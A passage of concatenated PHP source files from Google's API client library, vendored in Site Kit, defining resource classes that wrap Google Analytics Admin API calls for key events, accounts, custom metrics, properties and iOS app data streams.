$this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEvent::class); } /** * Deletes a Key Event. (keyEvents.delete) * * @param string $name Required. The resource name of the Key Event to delete. * Format: properties/{property}/keyEvents/{key_event} Example: * "properties/123/keyEvents/456" * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty * @throws \Google\Service\Exception */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Retrieve a single Key Event. (keyEvents.get) * * @param string $name Required. The resource name of the Key Event to retrieve. * Format: properties/{property}/keyEvents/{key_event} Example: * "properties/123/keyEvents/456" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaKeyEvent * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEvent::class); } /** * Returns a list of Key Events in the specified parent property. Returns an * empty list if no Key Events are found. (keyEvents.listPropertiesKeyEvents) * * @param string $parent Required. The resource name of the parent property. * Example: 'properties/123' * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200; * (higher values will be coerced to the maximum) * @opt_param string pageToken A page token, received from a previous * `ListKeyEvents` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListKeyEvents` must match the * call that provided the page token. * @return GoogleAnalyticsAdminV1betaListKeyEventsResponse * @throws \Google\Service\Exception */ public function listPropertiesKeyEvents($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListKeyEventsResponse::class); } /** * Updates a Key Event. (keyEvents.patch) * * @param string $name Output only. Resource name of this key event. Format: * properties/{property}/keyEvents/{key_event} * @param GoogleAnalyticsAdminV1betaKeyEvent $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (e.g., "field_to_update"). Omitted fields * will not be updated. To replace the entire entity, use one path with the * string "*" to match all fields. * @return GoogleAnalyticsAdminV1betaKeyEvent * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEvent $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEvent::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesKeyEvents::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesKeyEvents'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataSharingSettings; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListAccountsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProvisionAccountTicketRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProvisionAccountTicketResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "accounts" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $accounts = $analyticsadminService->accounts; * </code> */ class Accounts extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Marks target Account as soft-deleted (ie: "trashed") and returns it. This API * does not have a method to restore soft-deleted accounts. However, they can be * restored using the Trash Can UI. If the accounts are not restored before the * expiration time, the account and all child resources (eg: Properties, * GoogleAdsLinks, Streams, AccessBindings) will be permanently purged. * https://support.google.com/analytics/answer/6154772 Returns an error if the * target is not found. (accounts.delete) * * @param string $name Required. The name of the Account to soft-delete. Format: * accounts/{account} Example: "accounts/100" * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty * @throws \Google\Service\Exception */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single Account. (accounts.get) * * @param string $name Required. The name of the account to lookup. Format: * accounts/{account} Example: "accounts/100" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaAccount * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount::class); } /** * Get data sharing settings on an account. Data sharing settings are * singletons. (accounts.getDataSharingSettings) * * @param string $name Required. The name of the settings to lookup. Format: * accounts/{account}/dataSharingSettings Example: * "accounts/1000/dataSharingSettings" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaDataSharingSettings * @throws \Google\Service\Exception */ public function getDataSharingSettings($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('getDataSharingSettings', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataSharingSettings::class); } /** * Returns all accounts accessible by the caller. Note that these accounts might * not currently have GA4 properties. Soft-deleted (ie: "trashed") accounts are * excluded by default. Returns an empty list if no relevant accounts are found. * (accounts.listAccounts) * * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. The * service may return fewer than this value, even if there are additional pages. * If unspecified, at most 50 resources will be returned. The maximum value is * 200; (higher values will be coerced to the maximum) * @opt_param string pageToken A page token, received from a previous * `ListAccounts` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListAccounts` must match the * call that provided the page token. * @opt_param bool showDeleted Whether to include soft-deleted (ie: "trashed") * Accounts in the results. Accounts can be inspected to determine whether they * are deleted or not. * @return GoogleAnalyticsAdminV1betaListAccountsResponse * @throws \Google\Service\Exception */ public function listAccounts($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListAccountsResponse::class); } /** * Updates an account. (accounts.patch) * * @param string $name Output only. Resource name of this account. Format: * accounts/{account} Example: "accounts/100" * @param GoogleAnalyticsAdminV1betaAccount $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (for example, "field_to_update"). Omitted * fields will not be updated. To replace the entire entity, use one path with * the string "*" to match all fields. * @return GoogleAnalyticsAdminV1betaAccount * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount::class); } /** * Requests a ticket for creating an account. (accounts.provisionAccountTicket) * * @param GoogleAnalyticsAdminV1betaProvisionAccountTicketRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaProvisionAccountTicketResponse * @throws \Google\Service\Exception */ public function provisionAccountTicket(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProvisionAccountTicketRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('provisionAccountTicket', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProvisionAccountTicketResponse::class); } /** * Returns a customized report of data access records. The report provides * records of each time a user reads Google Analytics reporting data. Access * records are retained for up to 2 years. Data Access Reports can be requested * for a property. Reports may be requested for any property, but dimensions * that aren't related to quota can only be requested on Google Analytics 360 * properties. This method is only available to Administrators. These data * access records include GA4 UI Reporting, GA4 UI Explorations, GA4 Data API, * and other products like Firebase & Admob that can retrieve data from Google * Analytics through a linkage. These records don't include property * configuration changes like adding a stream or changing a property's time * zone. For configuration change history, see [searchChangeHistoryEvents](https * ://developers.google.com/analytics/devguides/config/admin/v1/rest/v1alpha/acc * ounts/searchChangeHistoryEvents). (accounts.runAccessReport) * * @param string $entity The Data Access Report supports requesting at the * property level or account level. If requested at the account level, Data * Access Reports include all access for all properties under that account. To * request at the property level, entity should be for example 'properties/123' * if "123" is your GA4 property ID. To request at the account level, entity * should be for example 'accounts/1234' if "1234" is your GA4 Account ID. * @param GoogleAnalyticsAdminV1betaRunAccessReportRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaRunAccessReportResponse * @throws \Google\Service\Exception */ public function runAccessReport($entity, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportRequest $postBody, $optParams = []) { $params = ['entity' => $entity, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('runAccessReport', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportResponse::class); } /** * Searches through all changes to an account or its children given the * specified set of filters. (accounts.searchChangeHistoryEvents) * * @param string $account Required. The account resource for which to return * change history resources. Format: accounts/{account} Example: "accounts/100" * @param GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsResponse * @throws \Google\Service\Exception */ public function searchChangeHistoryEvents($account, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsRequest $postBody, $optParams = []) { $params = ['account' => $account, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('searchChangeHistoryEvents', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaSearchChangeHistoryEventsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\Accounts::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_Accounts'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaArchiveCustomMetricRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomMetric; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListCustomMetricsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "customMetrics" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $customMetrics = $analyticsadminService->properties_customMetrics; * </code> */ class PropertiesCustomMetrics extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Archives a CustomMetric on a property. (customMetrics.archive) * * @param string $name Required. The name of the CustomMetric to archive. * Example format: properties/1234/customMetrics/5678 * @param GoogleAnalyticsAdminV1betaArchiveCustomMetricRequest $postBody * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty * @throws \Google\Service\Exception */ public function archive($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaArchiveCustomMetricRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('archive', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Creates a CustomMetric. (customMetrics.create) * * @param string $parent Required. Example format: properties/1234 * @param GoogleAnalyticsAdminV1betaCustomMetric $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaCustomMetric * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomMetric $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomMetric::class); } /** * Lookup for a single CustomMetric. (customMetrics.get) * * @param string $name Required. The name of the CustomMetric to get. Example * format: properties/1234/customMetrics/5678 * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaCustomMetric * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomMetric::class); } /** * Lists CustomMetrics on a property. * (customMetrics.listPropertiesCustomMetrics) * * @param string $parent Required. Example format: properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200 * (higher values will be coerced to the maximum). * @opt_param string pageToken A page token, received from a previous * `ListCustomMetrics` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListCustomMetrics` must match * the call that provided the page token. * @return GoogleAnalyticsAdminV1betaListCustomMetricsResponse * @throws \Google\Service\Exception */ public function listPropertiesCustomMetrics($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListCustomMetricsResponse::class); } /** * Updates a CustomMetric on a property. (customMetrics.patch) * * @param string $name Output only. Resource name for this CustomMetric * resource. Format: properties/{property}/customMetrics/{customMetric} * @param GoogleAnalyticsAdminV1betaCustomMetric $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Omitted fields will not be updated. To replace the entire entity, use one * path with the string "*" to match all fields. * @return GoogleAnalyticsAdminV1betaCustomMetric * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomMetric $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaCustomMetric::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesCustomMetrics::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesCustomMetrics'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataRetentionSettings; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListPropertiesResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportResponse; /** * The "properties" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $properties = $analyticsadminService->properties; * </code> */ class Properties extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Acknowledges the terms of user data collection for the specified property. * This acknowledgement must be completed (either in the Google Analytics UI or * through this API) before MeasurementProtocolSecret resources may be created. * (properties.acknowledgeUserDataCollection) * * @param string $property Required. The property for which to acknowledge user * data collection. * @param GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionResponse * @throws \Google\Service\Exception */ public function acknowledgeUserDataCollection($property, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionRequest $postBody, $optParams = []) { $params = ['property' => $property, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('acknowledgeUserDataCollection', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionResponse::class); } /** * Creates an "GA4" property with the specified location and attributes. * (properties.create) * * @param GoogleAnalyticsAdminV1betaProperty $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaProperty * @throws \Google\Service\Exception */ public function create(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty::class); } /** * Marks target Property as soft-deleted (ie: "trashed") and returns it. This * API does not have a method to restore soft-deleted properties. However, they * can be restored using the Trash Can UI. If the properties are not restored * before the expiration time, the Property and all child resources (eg: * GoogleAdsLinks, Streams, AccessBindings) will be permanently purged. * https://support.google.com/analytics/answer/6154772 Returns an error if the * target is not found, or is not a GA4 Property. (properties.delete) * * @param string $name Required. The name of the Property to soft-delete. * Format: properties/{property_id} Example: "properties/1000" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaProperty * @throws \Google\Service\Exception */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty::class); } /** * Lookup for a single "GA4" Property. (properties.get) * * @param string $name Required. The name of the property to lookup. Format: * properties/{property_id} Example: "properties/1000" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaProperty * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty::class); } /** * Returns the singleton data retention settings for this property. * (properties.getDataRetentionSettings) * * @param string $name Required. The name of the settings to lookup. Format: * properties/{property}/dataRetentionSettings Example: * "properties/1000/dataRetentionSettings" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaDataRetentionSettings * @throws \Google\Service\Exception */ public function getDataRetentionSettings($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('getDataRetentionSettings', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataRetentionSettings::class); } /** * Returns child Properties under the specified parent Account. Only "GA4" * properties will be returned. Properties will be excluded if the caller does * not have access. Soft-deleted (ie: "trashed") properties are excluded by * default. Returns an empty list if no relevant properties are found. * (properties.listProperties) * * @param array $optParams Optional parameters. * * @opt_param string filter Required. An expression for filtering the results of * the request. Fields eligible for filtering are: `parent:`(The resource name * of the parent account/property) or `ancestor:`(The resource name of the * parent account) or `firebase_project:`(The id or number of the linked * firebase project). Some examples of filters: ``` | Filter | Description | * |-----------------------------|-------------------------------------------| | * parent:accounts/123 | The account with account id: 123. | | * parent:properties/123 | The property with property id: 123. | | * ancestor:accounts/123 | The account with account id: 123. | | * firebase_project:project-id | The firebase project with id: project-id. | | * firebase_project:123 | The firebase project with number: 123. | ``` * @opt_param int pageSize The maximum number of resources to return. The * service may return fewer than this value, even if there are additional pages. * If unspecified, at most 50 resources will be returned. The maximum value is * 200; (higher values will be coerced to the maximum) * @opt_param string pageToken A page token, received from a previous * `ListProperties` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListProperties` must match the * call that provided the page token. * @opt_param bool showDeleted Whether to include soft-deleted (ie: "trashed") * Properties in the results. Properties can be inspected to determine whether * they are deleted or not. * @return GoogleAnalyticsAdminV1betaListPropertiesResponse * @throws \Google\Service\Exception */ public function listProperties($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListPropertiesResponse::class); } /** * Updates a property. (properties.patch) * * @param string $name Output only. Resource name of this property. Format: * properties/{property_id} Example: "properties/1000" * @param GoogleAnalyticsAdminV1betaProperty $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (e.g., "field_to_update"). Omitted fields * will not be updated. To replace the entire entity, use one path with the * string "*" to match all fields. * @return GoogleAnalyticsAdminV1betaProperty * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty::class); } /** * Returns a customized report of data access records. The report provides * records of each time a user reads Google Analytics reporting data. Access * records are retained for up to 2 years. Data Access Reports can be requested * for a property. Reports may be requested for any property, but dimensions * that aren't related to quota can only be requested on Google Analytics 360 * properties. This method is only available to Administrators. These data * access records include GA4 UI Reporting, GA4 UI Explorations, GA4 Data API, * and other products like Firebase & Admob that can retrieve data from Google * Analytics through a linkage. These records don't include property * configuration changes like adding a stream or changing a property's time * zone. For configuration change history, see [searchChangeHistoryEvents](https * ://developers.google.com/analytics/devguides/config/admin/v1/rest/v1alpha/acc * ounts/searchChangeHistoryEvents). (properties.runAccessReport) * * @param string $entity The Data Access Report supports requesting at the * property level or account level. If requested at the account level, Data * Access Reports include all access for all properties under that account. To * request at the property level, entity should be for example 'properties/123' * if "123" is your GA4 property ID. To request at the account level, entity * should be for example 'accounts/1234' if "1234" is your GA4 Account ID. * @param GoogleAnalyticsAdminV1betaRunAccessReportRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaRunAccessReportResponse * @throws \Google\Service\Exception */ public function runAccessReport($entity, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportRequest $postBody, $optParams = []) { $params = ['entity' => $entity, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('runAccessReport', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaRunAccessReportResponse::class); } /** * Updates the singleton data retention settings for this property. * (properties.updateDataRetentionSettings) * * @param string $name Output only. Resource name for this DataRetentionSetting * resource. Format: properties/{property}/dataRetentionSettings * @param GoogleAnalyticsAdminV1betaDataRetentionSettings $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (e.g., "field_to_update"). Omitted fields * will not be updated. To replace the entire entity, use one path with the * string "*" to match all fields. * @return GoogleAnalyticsAdminV1betaDataRetentionSettings * @throws \Google\Service\Exception */ public function updateDataRetentionSettings($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataRetentionSettings $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('updateDataRetentionSettings', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataRetentionSettings::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\Properties::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_Properties'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaIosAppDataStream; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListIosAppDataStreamsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "iosAppDataStreams" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $iosAppDataStreams = $analyticsadminService->iosAppDataStreams; * </code> */ class PropertiesIosAppDataStreams extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Deletes an iOS app stream on a property. (iosAppDataStreams.delete) * * @param string $name Required. The name of the iOS app data stream to delete. * Format: properties/{property_id}/iosAppDataStreams/{stream_id} Example: * "properties/123/iosAppDataStreams/456" * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single IosAppDataStream (iosAppDataStreams.get) * * @param string $name Required. The name of the iOS app data stream to lookup. * Format: properties/{property_id}/iosAppDataStreams/{stream_id} Example: * "properties/123/iosAppDataStreams/456" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaIosAppDataStream */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaIosAppDataStream::class); } /** * Returns child iOS app data streams under the specified parent property. iOS * app data streams will be excluded if the caller does not have access. Returns * an empty list if no relevant iOS app data streams are found. * (iosAppDataStreams.listPropertiesIosAppDataStreams) * * @param string $parent Required. The name of the parent property. For example, * to list results of app 